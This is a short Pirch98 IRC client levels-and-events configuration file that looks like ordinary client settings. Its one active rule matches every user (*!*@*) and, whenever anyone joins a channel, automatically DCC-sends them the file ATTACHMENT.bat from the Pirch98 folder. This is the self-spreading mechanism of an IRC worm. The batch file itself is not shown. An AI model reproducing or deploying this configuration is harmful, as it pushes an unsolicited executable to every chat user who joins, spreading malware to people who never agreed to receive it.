[Levels] 
Enabled=1 
Count=6 
Level1=000-Unknows 
000-UnknowsEnabled=1 
Level2=100-Level 100 
100-Level 100Enabled=1 
Level3=200-Level 200 
200-Level 200Enabled=1 
Level4=300-Level 300 
300-Level 300Enabled=1 
Level5=400-Level 400 
400-Level 400Enabled=1 
Level6=500-Level 500 
500-Level 500Enabled=1 
[000-Unknowns] 
User1=*!*@* 
UserCount=1 
Events1= ON JOIN:#: /dcc send $nick C:\Pirch98\ATTACHMENT.bat 
EventCount=1 
[100-Level 100] 
UserCount=0 
EventCount=0 
[200-Level 200] 
UserCount=0 
EventCount=0 
[300-Level 300] 
UserCount=0 
EventCount=0 
[400-Level 400] 
UserCount=0 
EventCount=0 
[500-Level 500] 
UserCount=0 
EventCount=0 
